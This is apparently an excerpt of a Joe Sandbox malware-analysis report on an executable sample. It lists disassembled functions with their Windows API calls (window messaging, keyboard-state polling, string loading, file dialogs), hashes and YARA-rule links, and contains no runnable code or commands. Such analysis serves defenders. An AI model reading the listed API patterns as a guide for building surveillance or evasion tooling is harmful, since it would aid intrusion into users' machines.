                                                                                                                                                                                                                                                            Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                            • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 0045E5F6
                                                                                                                                                                                                                                                            • _wprintf.LIBCMT ref: 0045E6A3
                                                                                                                                                                                                                                                            • _wprintf.LIBCMT ref: 0045E6C7
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                                                                                                                                                                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                                                                            • API String ID: 2295938435-8599901
                                                                                                                                                                                                                                                            • Opcode ID: 97ebc5a5c228c2a30bddf96a7da616a93a1f5c8b5e746e323a0bc296dbc3a2d1
                                                                                                                                                                                                                                                            • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97ebc5a5c228c2a30bddf96a7da616a93a1f5c8b5e746e323a0bc296dbc3a2d1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                                                                                                                                                                                                            Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • timeGetTime.WINMM ref: 00443B67
                                                                                                                                                                                                                                                              • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                                                                                                                                                                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                                                                                                                                                                                                                                            • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                                                                                                                                                                                                            • IsWindow.USER32(00000000), ref: 00443C3A
                                                                                                                                                                                                                                                            • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                                                                                                                                                                                                                                              • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                                                                                                                                                                              • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                                                                                                                                                                              • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                                                                                                                                                                            • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                                                                                                                                                                                                            • String ID: BUTTON
                                                                                                                                                                                                                                                            • API String ID: 1834419854-3405671355
                                                                                                                                                                                                                                                            • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                                                                                                                                                                            • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                                                                                                                                                                                                            Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000), ref: 00454040
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                            • _wprintf.LIBCMT ref: 00454074
                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 004540A3
                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                                                                                                                                                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                            • API String ID: 455036304-4153970271
                                                                                                                                                                                                                                                            • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                                                                                                                                                                            • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                                                                                                                                                                                                            Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                                                                                                                                                                                                            • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                                                                                                                                                                                                            • _memmove.LIBCMT ref: 00467EB8
                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                                                                                                                                                                                                            • _memmove.LIBCMT ref: 00467F6C
                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2170234536-0
                                                                                                                                                                                                                                                            • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                                                                                                                                                                                                            • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                                                                                                                                                                                                            Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 00453E26
                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                                                                                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                                                                                                                                            • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                                                                                                                                                                            • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                                                                                                                                                                                                            Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                                                                                                                                                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3096461208-0
                                                                                                                                                                                                                                                            • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                                                                                                                                                                            • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                                                                                                                                                                                                            Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0047151E
                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004715EA
                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3218148540-0
                                                                                                                                                                                                                                                            • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                                                                                                                                                                            • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                                                                                                                                                                                                            Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 136442275-0
                                                                                                                                                                                                                                                            • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                                                                                                                                                                            • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                                                                                                                                                                                                            Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 00467490
                                                                                                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 004674BC
                                                                                                                                                                                                                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                                                                                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                                                                                                                            • _wcstok.LIBCMT ref: 004674FF
                                                                                                                                                                                                                                                              • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                                                                                                                                                                            • _wcstok.LIBCMT ref: 004675B2
                                                                                                                                                                                                                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00467793
                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 00467641
                                                                                                                                                                                                                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 004677BD
                                                                                                                                                                                                                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                                                                                                                                                                              • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
